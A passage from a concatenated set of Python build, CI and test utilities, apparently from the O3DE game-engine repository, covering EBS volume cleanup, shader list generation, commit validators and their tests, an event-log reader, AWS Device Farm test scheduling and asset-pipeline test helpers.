branch_job.get('latestRun') # If the job hasn't run, then there is no EBS volumes tied to that job if latest_run: latest_run_start_time = latest_run.get('startTime') latest_run_datetime = datetime.strptime(latest_run_start_time, '%Y-%m-%dT%H:%M:%S.%f%z') # Convert startTime to local timezone to compare, because Jenkins server may use a different timezone. latest_run_date = latest_run_datetime.astimezone().date() date_diff = today_date - latest_run_date if date_diff.days > retention_days: print(f'Branch {branch_name} job hasn\'t run for over {retention_days} days, deleting the EBS volumes of this branch...') delete_branch_ebs_volumes(branch_name) branch_volumes_deleted.append(branch_name) print('Deleted EBS volumes for branches:') print('\n'.join(branch_volumes_deleted)) def get_required_env(env, keys): success = True for key in keys: try: env[key] = os.environ[key].strip() except KeyError: print(f'ERROR: {key} is not set in environment variable') success = False return success def main(): env = {} required_env_list = [ 'JENKINS_URL', 'JENKINS_USERNAME', 'JENKINS_API_TOKEN', 'PIPELINE_NAME', 'RETENTION_DAYS' ] if not get_required_env(env, required_env_list): print('ERROR: Required environment variable is not set, see log for more details.') delete_old_branch_ebs_volumes(env) if __name__ == "__main__": main() ``` #### File: scripts/bundler/get_shader_list.py ```python import argparse import os import pathlib import subprocess def error(msg): print(msg) exit(1) def is_windows(): if os.name == 'nt': return True else: return False def get_shader_list(project_path, asset_platform, shader_type, shader_platform, shadergen_path): """ Gets the shader list for a specific platform using ShaderCacheGen. Right now the shader list will always output at <project-path>/user/Cache/Shaders That will change when this is updated to take a destination path """ shadergen_path = os.path.join(shadergen_path, 'ShaderCacheGen') if is_windows(): shadergen_path += '.exe' command_args = [ shadergen_path, f'--project-path={str(project_path)}' '--GetShaderList', '--ShadersPlatform={}'.format(shader_type), '--TargetPlatform={}'.format(asset_platform) ] if not os.path.isfile(shadergen_path): error("[ERROR] ShaderCacheGen could not be found at {}".format(shadergen_path)) else: command = ' '.join(command_args) print('[INFO] get_shader_list: Running command - {}'.format(command)) try: subprocess.check_call(command, shell=True) except subprocess.CalledProcessError: error('[ERROR] Failed to get the shader list for {}'.format(shader_type)) parser = argparse.ArgumentParser(description='Gets the shader list for a specific platform from the current shader compiler server') parser.add_argument('-g', '--project-path', type=pathlib.Path, required=True, help="Path to the project") parser.add_argument('asset-platform', type=str, help="The asset cache sub folder to use for shader generation") parser.add_argument('shader-type', type=str, help="The shader type to use") parser.add_argument('-p', '--shader_platform', type=str, required=False, default='', help="The target platform to generate shaders for.") parser.add_argument('-s', '--shadergen_path', type=str, help="Path to where the the ShaderCacheGen executable lives") args = parser.parse_args() print('Getting shader list for {}'.format(args.asset_platform)) get_shader_list(args.project_path, args.asset_platform, args.shader_type, args.shader_platform, args.shadergen_path) print('Finish getting shader list') ``` #### File: tests/validators/test_git_conflict_validator.py ```python import unittest from unittest.mock import patch, mock_open from commit_validation.tests.mocks.mock_commit import MockCommit from commit_validation.validators.git_conflict_validator import GitConflictValidator class NewlineValidatorTests(unittest.TestCase): @patch('builtins.open', mock_open(read_data='This file is completely normal\n' 'and should pass\n')) def test_HasConflictMarkers_NoMarkers_Pass(self): commit = MockCommit(files=['/someFile.cpp']) error_list = [] self.assertTrue(GitConflictValidator().run(commit, error_list)) self.assertEqual(len(error_list), 0, f"Unexpected errors: {error_list}") @patch('builtins.open', mock_open(read_data='This file has a start marker\n' '<<<<<<< ours\n' 'and should fail\n')) def test_HasConflictMarkers_StartMarker_Fail(self): commit = MockCommit(files=['/someFile.cpp']) error_list = [] self.assertFalse(GitConflictValidator().run(commit, error_list)) self.assertNotEqual(len(error_list), 0, f"Errors were expected but none were returned.") @patch('builtins.open', mock_open(read_data='This file has a diff3 marker from using --conflict=diff3\n' '||||||| base\n' 'and should fail\n')) def test_HasConflictMarkers_BaseMarker_Fail(self): commit = MockCommit(files=['/someFile.cpp']) error_list = [] self.assertFalse(GitConflictValidator().run(commit, error_list)) self.assertNotEqual(len(error_list), 0, f"Errors were expected but none were returned.") @patch('builtins.open', mock_open(read_data='This file has a diff marker\n' '=======\n' 'and should fail\n')) def test_HasConflictMarkers_DiffMarker_Fail(self): commit = MockCommit(files=['/someFile.cpp']) error_list = [] self.assertFalse(GitConflictValidator().run(commit, error_list)) self.assertNotEqual(len(error_list), 0, f"Errors were expected but none were returned.") @patch('builtins.open', mock_open(read_data='This file has and end marker\n' '>>>>>>> theirs\n' 'and should fail\n')) def test_HasConflictMarkers_EndMarker_Fail(self): commit = MockCommit(files=['/someFile.cpp']) error_list = [] self.assertFalse(GitConflictValidator().run(commit, error_list)) self.assertNotEqual(len(error_list), 0, f"Errors were expected but none were returned.") @patch('builtins.open', mock_open(read_data='This file has a equals sign divider of length seven, but is indented\n' ' /*\n' ' =======\n' ' */' 'and should pass\n')) def test_HasConflictMarkers_IndentedCommentDivider_Pass(self): commit = MockCommit(files=['/someFile.cpp']) error_list = [] self.assertTrue(GitConflictValidator().run(commit, error_list)) self.assertEqual(len(error_list), 0, f"Unexpected errors: {error_list}") @patch('builtins.open', mock_open(read_data='This file has an unindented equals sign divider, of length eight\n' '/*\n' '========\n' '*/' 'and should pass\n')) def test_HasConflictMarkers_LongCommentDivider_Pass(self): commit = MockCommit(files=['/someFile.cpp']) error_list = [] self.assertTrue(GitConflictValidator().run(commit, error_list)) self.assertEqual(len(error_list), 0, f"Unexpected errors: {error_list}") @patch('builtins.open', mock_open(read_data='This file has an unindented equals sign divider, of length six\n' '/*\n' '======\n' '*/' 'and should pass\n')) def test_HasConflictMarkers_ShortCommentDivider_Pass(self): commit = MockCommit(files=['/someFile.cpp']) error_list = [] self.assertTrue(GitConflictValidator().run(commit, error_list)) self.assertEqual(len(error_list), 0, f"Unexpected errors: {error_list}") if __name__ == '__main__': unittest.main() ``` #### File: commit_validation/validators/unicode_validator.py ```python import fnmatch import os.path from typing import Type, List from commit_validation.commit_validation import Commit, CommitValidator, IsFileSkipped, SOURCE_AND_SCRIPT_FILE_EXTENSIONS, EXCLUDED_VALIDATION_PATTERNS, VERBOSE allowed_chars = { 0xAD, # '_' 0xAE, # '®' 0xB0, # '°' } class UnicodeValidator(CommitValidator): """A file-level validator that makes sure a file does not contain unicode characters""" def run(self, commit: Commit, errors: List[str]) -> bool: for file_name in commit.get_files(): if IsFileSkipped(file_name): if VERBOSE: print(f'{file_name}::{self.__class__.__name__} SKIPPED UnicodeValidator - File excluded based on extension.') continue for pattern in EXCLUDED_VALIDATION_PATTERNS: if fnmatch.fnmatch(file_name, pattern): if VERBOSE: print(f'{file_name} SKIPPED UnicodeValidator - Validation pattern excluded on path.') break else: with open(file_name, 'r', encoding='utf-8', errors='strict') as fh: linecount = 1 for line in fh: columncount = 0 for ch in line: ord_ch = ord(ch) if ord_ch > 127 and ord_ch not in allowed_chars: error_message = str(f'{file_name}::{self.__class__.__name__}:{linecount},{columncount} FAILED - Source file contains unicode character, replace with \\u{ord_ch:X}.') errors.append(error_message) if VERBOSE: print(error_message) columncount += 1 linecount += 1 return (not errors) def get_validator() -> Type[UnicodeValidator]: """Returns the validator class for this module""" return UnicodeValidator ``` #### File: scripts/commit_validation/p4_validate_changelist.py ```python import argparse import os import sys from typing import Dict, List import difflib from commit_validation.commit_validation import Commit, validate_commit from p4 import run_p4_command class P4Changelist(Commit): """An implementation of the :class:`Commit` interface for accessing details about a Perforce changelist""" def __init__(self, client: str = None, change: str = 'default') -> None: """Creates a new instance of :class:`P4Changelist` :param client: the Perforce client :param change: the Perforce changelist """ self.client = client self.change = change self.files: List[str] = [] self.removed_files: List[str] = [] self.file_diffs: Dict[str, str] = {} self._load_files() def _load_files(self): self.files = [] self.removed_files = [] self.added_files = [] client_spec = run_p4_command(f'client -o', client=self.client)[0] files = run_p4_command(f'opened -c {self.change}', client=self.client) for f in files: file_path = os.path.abspath(f['clientFile'].replace(f'//{client_spec["Client"]}', client_spec['Root'])) if 'delete' in f['action']: self.removed_files.append(file_path) elif 'add' in f['action']: self.added_files.append(file_path) elif 'branch' in f['action']: self.added_files.append(file_path) else: self.files.append(file_path) def get_file_diff(self, file) -> str: if file in self.file_diffs: # allow caching return self.file_diffs[file] if file in self.added_files: # added files return the entire file as a diff. with open(file, "rt", encoding='utf8', errors='replace') as opened_file: data = opened_file.readlines() diffs = difflib.unified_diff([], data, fromfile=file, tofile=file) diff_being_built = ''.join(diffs) self.file_diffs[file] = diff_being_built return diff_being_built if file not in self.files: raise RuntimeError(f"Cannot calculate a diff for a file not in the changelist: {file}") try: result = run_p4_command(f'diff -du {file}', client=self.client) if len(result) > 1: diff = result[1]['data'] # p4 returns a normal code but with no result if theres no diff else: diff = '' print(f'Warning: File being committed contains no changes {file}') # note that the p4 command handles the data and errors internally, no need to check. self.file_diffs[file] = diff return diff except RuntimeError as e: print(f'error during p4 operation, unable to get a diff: {e}') return '' def get_files(self) -> List[str]: # this is just files relevant to the operation return self.files + self.added_files def get_removed_files(self) -> List[str]: return self.removed_files def get_description(self) -> str: raise NotImplementedError def get_author(self) -> str: raise NotImplementedError def init_parser(): """Prepares the command line parser""" parser = argparse.ArgumentParser() parser.add_argument('--client', help='Perforce client') parser.add_argument('--change', default='default', help='Perforce changelist') return parser def main(): parser = init_parser() args = parser.parse_args() change = P4Changelist(client=args.client, change=args.change) if not validate_commit(commit=change, ignore_validators=["NewlineValidator", "WhitespaceValidator"]): sys.exit(1) sys.exit(0) if __name__ == '__main__': main() ``` #### File: o3de/scripts/o3de.py ```python import argparse import pathlib import sys def add_args(parser, subparsers) -> None: """ add_args is called to add expected parser arguments and subparsers arguments to each command such that it can be invoked by o3de.py Ex o3de.py can invoke the register downloadable commands by importing register, call add_args and execute: python o3de.py register --gem-path "C:/TestGem" :param parser: the caller instantiates a parser and passes it in here :param subparsers: the caller instantiates subparsers and passes it in here """ # As o3de.py shares the same name as the o3de package attempting to use a regular # from o3de import <module> line tries to import from the current o3de.py script and not the package # So the {current script directory} / 'o3de' is added to the front of the sys.path script_dir = pathlib.Path(__file__).parent o3de_package_dir = (script_dir / 'o3de').resolve() # add the scripts/o3de directory to the front of the sys.path sys.path.insert(0, str(o3de_package_dir)) from o3de import engine_template, global_project, register, print_registration, get_registration, \ enable_gem, disable_gem, project_properties, sha256 # Remove the temporarily added path sys.path = sys.path[1:] # global_project global_project.add_args(subparsers) # engine templaate engine_template.add_args(subparsers) # register register.add_args(subparsers) # show print_registration.add_args(subparsers) # get-registered get_registration.add_args(subparsers) # add a gem to a project enable_gem.add_args(subparsers) # remove a gem from a project disable_gem.add_args(subparsers) # modify project properties project_properties.add_args(subparsers) # sha256 sha256.add_args(subparsers) if __name__ == "__main__": # parse the command line args the_parser = argparse.ArgumentParser() # add subparsers the_subparsers = the_parser.add_subparsers(help='sub-command help') # add args to the parser add_args(the_parser, the_subparsers) # parse args the_args = the_parser.parse_args() # if empty print help if len(sys.argv) == 1: the_parser.print_help(sys.stderr) sys.exit(1) # run ret = the_args.func(the_args) # return sys.exit(ret) ``` #### File: EventLogTools/EventLogger/Reader.py ```python from EventLogger.Utils import EventBoundary, EventHeader, EventNameHash, LogHeader, Prolog, PrologId def size_align_up(size, align): return (size + (align - 1)) & ~(align - 1) class Reader(object): ReadStatus_Success = 0 ReadStatus_InsufficientFileSize = -1 ReadStatus_InvalidFormat = -2 ReadStatus_NoEvents = -3 def __init__(self): self.log_header = LogHeader() self.current_event = EventHeader() self.current_thread_id = None self.buffer = None self.buffer_size = 0 self.buffer_pos = 0 def read_log_file(self, file_path): with open(file_path, mode='rb') as log_file: self.buffer = log_file.read() self.buffer_size = len(self.buffer) if self.buffer_size < LogHeader.size(): return Reader.ReadStatus_InsufficientFileSize self.log_header.unpack(self.buffer) self.buffer_pos = LogHeader.size() if self.log_header.get_format() not in LogHeader.accepted_formats(): return Reader.ReadStatus_InvalidFormat if self.buffer_pos + EventHeader.size() > self.buffer_size: return Reader.ReadStatus_NoEvents self.current_event.unpack(self._get_next(EventHeader.size())) self._update_thread_id() return Reader.ReadStatus_Success def get_log_header(self): return self.log_header def get_thread_id(self): return self.current_thread_id def get_event_name(self): return EventNameHash(self.current_event.event_id) def get_event_size(self): return self.current_event.size def get_event_flags(self): return self.current_event.flags def get_event_data(self): start = self.buffer_pos + EventHeader.size() return self._get_next(self.get_event_size(), override_start=start) def get_event_string(self): string_data = self.get_event_data() return string_data.decode('utf-8') def next(self): real_size = EventHeader.size() + self.get_event_size() self.buffer_pos += size_align_up(real_size, EventBoundary) if self.buffer_pos < self.buffer_size: self.current_event.unpack(self._get_next(EventHeader.size())) self._update_thread_id() return True return False def _get_next(self, size, override_start=None): start = override_start or self.buffer_pos end = start + size return self.buffer[start:end] def _update_thread_id(self): if self.get_event_name() == PrologId: prolog = Prolog() prolog.unpack(self._get_next(Prolog.size())) self.current_thread_id = prolog.thread_id ``` #### File: Tools/LauncherTestTools/device_farm_schedule_run.py ```python import argparse import datetime import json import logging import os import subprocess import sys import time import requests logger = logging.getLogger(__name__) def bake_template(filename, values): """Open a template and replace values. Return path to baked file.""" # Open the options json template and replace with real values. with open(filename, 'r') as in_file: data = in_file.read() for key, value in values.iteritems(): data = data.replace(key, str(value)) filename_out = os.path.join('temp', filename) with open(filename_out, 'w') as out_file: out_file.write(data) return filename_out def execute_aws_command(args): """ Execut the aws cli devicefarm command. """ # Use .cmd on Windows, not sure exactly why, but aws will not be found without it. aws_executable = 'aws.cmd' if sys.platform.startswith('win') else 'aws' aws_args = [aws_executable, 'devicefarm', '--region', 'us-west-2'] + args logger.info("Running {} ...".format(" ".join(aws_args))) p = subprocess.Popen(aws_args, stdout=subprocess.PIPE) out, err = p.communicate() if p.returncode != 0: msg = "Command '{}' failed. return code: {} out: {} err: {}".format( " ".join(aws_args), p.returncode, out, err ) raise Exception(msg) return out def find_or_create_project(project_name): """ Find the project by name, or create a new one. """ list_projects_data = json.loads(execute_aws_command(['list-projects'])) # return the arn if it is found for project_data in list_projects_data['projects']: if project_data['name'] == project_name: logger.info("Found existing project named {}.".format(project_name)) return project_data['arn'] # project not found, create a new project with the give name project_data = json.loads(execute_aws_command(['create-project', '--name', project_name])) return project_data['project']['arn'] def find_or_create_device_pool(project_name, device_pool_name, device_arns): """ Find the device pool in the project by name, or create a new one. """ list_device_pools_data = json.loads(execute_aws_command(['list-device-pools', '--arn', project_name])) # return the arn if it is found for device_pool_data in list_device_pools_data['devicePools']: if device_pool_data['name'] == device_pool_name: logger.info("Found existing device pool named {}.".format(device_pool_name)) return device_pool_data['arn'] device_pool_json_path_out = bake_template( 'device_farm_default_device_pool_template.json', {'%DEVICE_ARN_LIST%' : device_arns}) # create a default device pool args = [ 'create-device-pool', '--project-arn', project_name, '--name', device_pool_name, '--rules', "file://{}".format(device_pool_json_path_out)] device_pools_data = json.loads(execute_aws_command(args)) return device_pools_data['devicePool']['arn'] def create_upload(project_arn, path, type): """ Create an upload and return the ARN """ args = ['create-upload', '--project-arn', project_arn, '--name', os.path.basename(path), '--type', type] upload_data = json.loads(execute_aws_command(args)) return upload_data['upload']['arn'], upload_data['upload']['url'] def send_upload(filename, url): """ Upload a file with a put request. """ logger.info("Sending upload {} ...".format(filename)) with open(filename, 'rb') as uploadfile: data = uploadfile.read() headers = {"content-type": "application/octet-stream"} output = requests.put(url, data=data, allow_redirects=True, headers=headers) logger.info("Sent upload {}.".format(output)) def wait_for_upload_to_finish(poll_time, upload_arn): """ Wait for an upload to finish by polling for status """ logger.info("Waiting for upload {} ...".format(upload_arn)) upload_data = json.loads(execute_aws_command(['get-upload', '--arn', upload_arn])) while not upload_data['upload']['status'] in ['SUCCEEDED', 'FAILED']: time.sleep(poll_time) upload_data = json.loads(execute_aws_command(['get-upload', '--arn', upload_arn])) if upload_data['upload']['status'] != 'SUCCEEDED': raise Exception('Upload failed.') def upload(poll_time, project_arn, path, type): """ Create the upload on the Device Farm, upload the file and wait for completion. """ arn, url = create_upload(project_arn, path, type) send_upload(path, url) wait_for_upload_to_finish(poll_time, arn) return arn def schedule_run(project_arn, app_arn, device_pool_arn, test_spec_arn, test_bundle_arn, execution_timeout): """ Schecule the test run on the Device Farm """ run_name = "LY LT {}".format(datetime.datetime.now().strftime("%I:%M%p on %B %d, %Y")) logger.info("Scheduling run {} ...".format(run_name)) schedule_run_test_json_path_out = bake_template( 'device_farm_schedule_run_test_template.json', {'%TEST_SPEC_ARN%' : test_spec_arn, '%TEST_PACKAGE_ARN%' : test_bundle_arn}) execution_configuration_json_path_out = bake_template( 'device_farm_schedule_run_execution_configuration_template.json', {'%EXECUTION_TIMEOUT%' : execution_timeout}) args = [ 'schedule-run', '--project-arn', project_arn, '--app-arn', app_arn, '--device-pool-arn', device_pool_arn, '--name', "\"{}\"".format(run_name), '--test', "file://{}".format(schedule_run_test_json_path_out), '--execution-configuration', "file://{}".format(execution_configuration_json_path_out)] schedule_run_data = json.loads(execute_aws_command(args)) return schedule_run_data['run']['arn'] def download_file(url, output_path): """ download a file from a url, save in output_path """ try: r = requests.get(url, stream=True) r.raise_for_status() output_folder = os.path.dirname(output_path) if not os.path.exists(output_folder): os.makedirs(output_folder) with open(output_path, 'wb') as f: for chunk in r.iter_content(chunk_size=8192): if chunk: f.write(chunk) except requests.exceptions.RequestException as e: logging.exception("Failed request for downloading file from {}.".format(url)) return False except IOError as e: logging.exception("Failed writing to file {}.".format(output_path)) return False return True def download_artifacts(run_arn, artifacts_output_folder): """ Download run artifacts and write to path set in artifacts_output_folder. """ logging.basicConfig(level=logging.DEBUG) list_jobs_data = json.loads(execute_aws_command(['list-jobs', '--arn', run_arn])) for job_data in list_jobs_data['jobs']: logger.info("Downloading artifacts for {} ...".format(job_data['name'])) safe_job_name = "".join(x for x in job_data['name'] if x.isalnum()) list_artifacts_data = json.loads(execute_aws_command(['list-artifacts', '--arn', job_data['arn'], '--type', 'FILE'])) for artifact_data in list_artifacts_data['artifacts']: # A run may contain many jobs. Usually each job is one device type. # Each job has 3 stages: setup, test and shutdown. You can tell what # stage an artifact is from based on the ARN. # We only care about artifacts from the main stage of the job, # not the setup or tear down artifacts. So parse the ARN and look # for the 00001 identifier. print artifact_data['arn'] if artifact_data['arn'].split('/')[3] == '00001': logger.info("Downloading artifacts {} ...".format(artifact_data['name'])) output_filename = "{}.{}".format( "".join(x for x in artifact_data['name'] if x.isalnum()), artifact_data['extension']) output_path = os.path.join(artifacts_output_folder, safe_job_name, output_filename) if not download_file(artifact_data['url'], output_path): msg = "Failed to download file from {} and save to {}".format(artifact_data['url'], output_path) logger.error(msg) def main(): parser = argparse.ArgumentParser(description='Upload and app and schedule a run on the Device Farm.') parser.add_argument('--app-path', required=True, help='Path of the app file.') parser.add_argument('--test-spec-path', required=True, help='Path of the test spec yaml.') parser.add_argument('--test-bundle-path', required=True, help='Path of the test bundle zip.') parser.add_argument('--project-name', required=True, help='The name of the project.') parser.add_argument('--device-pool-name', required=True, help='The name of the device pool.') parser.add_argument('--device-arns', default='\\"arn:aws:devicefarm:us-west-2::device:6CCDF49186B64E3FB27B9346AC9FAEC1\\"', help='List of device ARNs. Used when existing pool is not found by name. Default is Galaxy S8.') parser.add_argument('--wait-for-result', default="true", help='Set to "true" to wait for result of run.') parser.add_argument('--download-artifacts', default="true", help='Set to "true" to download artifacts after run. requires --wait-for-result') parser.add_argument('--artifacts-output-folder', default="temp", help='Folder to place the downloaded artifacts.') parser.add_argument('--upload-poll-time', default=10, help='How long to wait between polling upload status.') parser.add_argument('--run-poll-time', default=60, help='How long to wait between polling run status.') parser.add_argument('--run-execution-timeout', default=60, help='Run execution timeout.') parser.add_argument('--test-names', nargs='+', help='A list of test names to run, default runs all tests.') args = parser.parse_args() logging.basicConfig(level=logging.DEBUG) # Find the project by name, or create a new one. project_arn = find_or_create_project(args.project_name) # Find the device pool in the project by name, or create a new one. device_pool_arn = find_or_create_device_pool(project_arn, args.device_pool_name, args.device_arns) # Bake out EXTRA_ARGS option with args.test_names extra_args = "" if args.test_names: extra_args = "--test-names {}".format(" ".join("\"{}\"".format(test_name) for test_name in args.test_names)) test_spec_path_out = bake_template( args.test_spec_path, {'%EXTRA_ARGS%' : extra_args}) # Upload test spec and test bundle (Appium js is just a generic avenue to our own custom code). test_spec_arn = upload(args.upload_poll_time, project_arn, test_spec_path_out, 'APPIUM_NODE_TEST_SPEC') test_bundle_arn = upload(args.upload_poll_time, project_arn, args.test_bundle_path, 'APPIUM_NODE_TEST_PACKAGE') # Upload the app. type = 'ANDROID_APP' if args.app_path.lower().endswith('.apk') else 'IOS_APP' app_arn = upload(args.upload_poll_time, project_arn, args.app_path, type) # Schedule the test run. run_arn = schedule_run(project_arn, app_arn, device_pool_arn, test_spec_arn, test_bundle_arn, args.run_execution_timeout) logger.info('Run scheduled.') # Wait for run, exit with failure if test run fails. # strcmp with true for easy of use jenkins boolean env var. if args.wait_for_result.lower() == 'true': # Runs can take a long time, so just poll once a mintue by default. run_data = json.loads(execute_aws_command(['get-run', '--arn', run_arn])) while run_data['run']['result'] == 'PENDING': logger.info("Run status: {} waiting {} seconds ...".format(run_data['run']['result'], args.run_poll_time)) time.sleep(args.run_poll_time) run_data = json.loads(execute_aws_command(['get-run', '--arn', run_arn])) # Download run artifacts. strcmp with true for easy of use jenkins boolean env var. if args.download_artifacts.lower() == 'true': download_artifacts(run_arn, args.artifacts_output_folder) # If the run did not pass raise an exception to fail this jenkins job. if run_data['run']['result'] != 'PASSED': # Dump all of the run info. logger.info(run_data) # Raise an exception to fail this test. msg = "Run fail with result {}\nRun ARN: {}".format(run_data['run']['result'], run_arn) raise Exception(msg) logger.info('Run passed.') if __name__== "__main__": main() ``` #### File: ly_test_tools/o3de/pipeline_utils.py ```python import pytest import binascii import hashlib import os import re import hashlib import shutil import logging import subprocess import psutil from configparser import ConfigParser from typing import Dict, List, Tuple, Optional, Callable # Import LyTestTools import ly_test_tools.environment.file_system as fs import ly_test_tools.environment.process_utils as process_utils from ly_test_tools.o3de.ap_log_parser import APLogParser logger = logging.getLogger(__name__) # Asset Processor fast scan system setting key/subkey AP_FASTSCAN_KEY = r"Software\O3DE\O3DE Asset Processor\Options" AP_FASTSCAN_SUBKEY = r"EnableZeroAnalysis" class ProcessOutput(object): # Process data holding object def __init__(self) -> None: # type() -> None self.stdout = None self.stderr = None self.returncode = None self.exception_occurred = False def compare_assets_with_cache(assets: List[str], assets_cache_path: str) -> Tuple[List[str], List[str]]: """ Given a list of assets names, will try to find them (disrespecting file extensions) from project's Cache folder with test assets :param assets: A list of assets to be compared with Cache :param assets_cache_path: A path to cache test assets folder :return: A tuple with two lists - first is missing in cache assets, second is existing in cache assets """ missing_assets = [] existing_assets = [] if os.path.exists(assets_cache_path): files_in_cache = list(map(fs.remove_path_and_extension, os.listdir(assets_cache_path))) for asset in assets: file_without_ext = fs.remove_path_and_extension(asset).lower() if file_without_ext in files_in_cache: existing_assets.append(file_without_ext) files_in_cache.remove(file_without_ext) else: missing_assets.append(file_without_ext) else: missing_assets = assets return missing_assets, existing_assets def copy_assets_to_project(assets: List[str], source_directory: str, target_asset_dir: str) -> None: """ Given a list of asset names and a directory, copy those assets into the target project directory :param assets: A list of asset names to be copied :param source_directory: A path string where assets are located :param target_asset_dir: A path to project tests assets directory where assets will be copied over to :return: None """ if not os.path.exists(target_asset_dir): os.mkdir(target_asset_dir) for asset in assets: full_name = os.path.join(source_directory, asset) destination_fullname = os.path.join(target_asset_dir, asset) if os.path.isdir(full_name): shutil.copytree(full_name, destination_fullname) else: shutil.copyfile(full_name, destination_fullname) os.chmod(destination_fullname, 0o0777) def prepare_test_assets(assets_path: str, function_name: str, project_test_assets_dir: str) -> str: """ Given function name and assets cache path, will clear cache and copy test assets assigned to function name to project's folder :param assets_path: Path to tests assets folder :param function_name: Name of a function that corresponds to folder with assets :param project_test_assets_dir: A path to project directory with test assets :return: Returning path to copied assets folder """ test_assets_folder = os.path.join(assets_path, "assets", function_name) # Some tests don't have any assets to copy, which is fine, we don't want to fail in that case if os.path.exists(test_assets_folder): copy_assets_to_project(os.listdir(test_assets_folder), test_assets_folder, project_test_assets_dir) return test_assets_folder def find_joblog_file(joblogs_path: str, regexp: str) -> str: """ Given path to joblogs files and asset name in form of regexp, will try to find joblog file for provided asset; if multiple - will return first occurrence :param joblogs_path: Path to a folder with joblogs files to look for needed file :param regexp: Python Regexp to find the joblog file for the asset that was processed :return: Full path to joblog file, empty string if not found """ for file_name in os.listdir(joblogs_path): if re.match(regexp, file_name): return os.path.join(joblogs_path, file_name) return "" def find_missing_lines_in_joblog(joblog_location: str, strings_to_verify: List[str]) -> List[str]: """ Given joblog file full path and list of strings to verify, will find all missing strings in the file :param joblog_location: Full path to joblog file :param strings_to_verify: List of string to look for in joblog file :return: Subset of original strings list, that were not found in the file """ lines_not_found = [] with open(joblog_location, "r") as f: read_data = f.read() for line in strings_to_verify: if line not in read_data: lines_not_found.append(line) return lines_not_found def clear_project_test_assets_dir(test_assets_dir: str) -> None: """ On call - deletes test assets dir if it exists and creates new empty one :param test_assets_dir: A path to tests assets dir :return: None """ if os.path.exists(test_assets_dir): fs.delete([test_assets_dir], False, True) os.mkdir(test_assets_dir) def get_files_hashsum(path_to_files_dir: str) -> Dict[str, int]: """ On call - calculates md5 hashsums for filecontents. :param path_to_files_dir: A path to files directory :return: Returns a dict with initial filenames from path_to_files_dir as keys and their contents hashsums as values """ checksum_dict = {} try: for fname in os.listdir(path_to_files_dir): with open(os.path.join(path_to_files_dir, fname), "rb") as fopen: checksum_dict[fname] = hashlib.sha256(fopen.read()).digest() except IOError: logger.error("An error occurred trying to read file") return checksum_dict def append_to_filename(file_name: str, path_to_file: str, append_text: str, ignore_extension: str) -> None: """ Function for appending text to file and folder names :param file_name: Name of a file or folder :param path_to_file: Path to file or folder :param append_text: Text to append :param ignore_extension: True or False for ignoring extensions :return: None """ if not ignore_extension: (name, extension) = file_name.split(".") new_name = name + append_text + "." + extension else: new_name = file_name + append_text os.rename(os.path.join(path_to_file, file_name), os.path.join(path_to_file, new_name)) def create_asset_processor_backup_directories(backup_root_directory: str, test_backup_directory: str) -> None: """ Function for creating the asset processor logs backup directory structure :param backup_root_directory: The location where logs should be stored :param test_backup_directory: The directory for the specific test being ran :return: None """ if not os.path.exists(os.path.join(backup_root_directory, test_backup_directory)): os.makedirs(os.path.join(backup_root_directory, test_backup_directory)) def backup_asset_processor_logs(bin_directory: str, backup_directory: str) -> None: """ Function for backing up the logs created by asset processor to designated backup directory :param bin_directory: The bin directory created by the lumberyard build process :param backup_directory: The location where asset processor logs should be backed up to :return: None """ ap_logs = os.path.join(bin_directory, "logs") if os.path.exists(ap_logs): destination = os.path.join(backup_directory, "logs") shutil.copytree(ap_logs, destination) def safe_subprocess(command: str or List[str], **kwargs: Dict) -> ProcessOutput: """ Forwards arguments to subprocess.Popen to have a processes output args stdout and stderr can not be passed as they are used internally Setting check = true will change the received out put into a subprocess.CalledProcessError object IMPORTANT: This code might fail after upgrade to python 3 due to interpretation of byte and string data. :param command: A list of the command to execute and its arguments as split by whitespace. :param kwargs: Keyword args forwarded to subprocess.check_output. :return: Popen object with callable attributes that hold the piped out put of the process. """ cmd_string = command if type(command) == list: cmd_string = " ".join(command) logger.info(f'Executing "subprocess.Popen({cmd_string})"') # Initialize ProcessOutput object subprocess_output = ProcessOutput() try: # Run process # fmt:off output = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True, **kwargs) # fmt:on # Wait for process to complete output_data = output.communicate() # Read and process pipped outputs subprocess_output.stderr = output_data[1] subprocess_output.stdout = output_data[0] # Save process return code subprocess_output.returncode = output.returncode except subprocess.CalledProcessError as e: # Set object flag subprocess_output.exception_occurred = True # If error occurs when **kwargs includes check=True Exceptions are possible logger.warning(f'Command "{cmd_string}" failed with returncode {e.returncode}, output:\n{e.output}') # Read and process error outputs subprocess_output.stderr = e.output.read().decode() # Save error return code subprocess_output.returncode = e.returncode else: logger.info(f'Successfully executed "check_output({cmd_string})"') return subprocess_output def processes_with_substring_in_name(substring: str) -> tuple: """ Finds all existing processes that contain a specified substring in their names :param substring: the string to look for as a substring within process names :return: a tuple of all processes containing the substring in their names or an empty tuple if none are found """ processes = process_utils._safe_get_processes() targeted_processes = [] for p in processes: try: if substring.lower() in p.name().lower(): targeted_processes.append(p) except psutil.NoSuchProcess as e: logger.info(f"Process {p} was killed during processes_with_substring_in_name()!\nError: {e}") continue return tuple(targeted_processes) def child_process_list(pid: int, name_filter: str = None) -> List[int]: """ Return the list of child process objects of the given pid :param pid: process id of the parent process :param name_filter: optional name to match child processes against :return: List of matching process objects """ return_list = [] for child in psutil.Process(pid).children(recursive=True): if not name_filter or child.name() == name_filter: return_list.append(child) return return_list def process_cpu_usage_below(process_name: str, cpu_usage_threshold: float) -> bool: """ Checks whether CPU usage by a specified process is below a specified threshold :param process_name: String to search for within the names of active processes :param cpu_usage_threshold: Float at or above which CPU usage by a process instance is too high :return: True if the CPU usage for each instance of the specified process is below the threshold, False if not """ # Get all instances of targeted process targeted_processes = processes_with_substring_in_name(process_name) assert len(targeted_processes) > 0, f"No instances of {process_name} were found" # Return whether all instances of targeted process are idle for targeted_process in targeted_processes: logger.info(f"Process name: {targeted_process.name()}") if hasattr(targeted_process, "pid"): logger.info(f"Process ID: {targeted_process.pid}") process_cpu_load = targeted_process.cpu_percent(interval=1) logger.info(f"Process CPU load: {process_cpu_load}") if process_cpu_load >= cpu_usage_threshold: return False return True def temp_test_dir(request, dir_path: str) -> str: """ Creates a temporary test directory to be deleted on teardown :param dir_path: path for the temporary test directory :return: path to the temporary test directory """ # Clear the directory if it exists and create the temporary test directory clear_project_test_assets_dir(dir_path) # Delete the directory on teardown request.addfinalizer(lambda: fs.delete([dir_path], False, True)) return dir_path def get_relative_file_paths(start_dir: str, ignore_list: Optional[List[str]] = None) -> List[str]: """ Collects all relative paths for files under the [start_dir] directory tree. 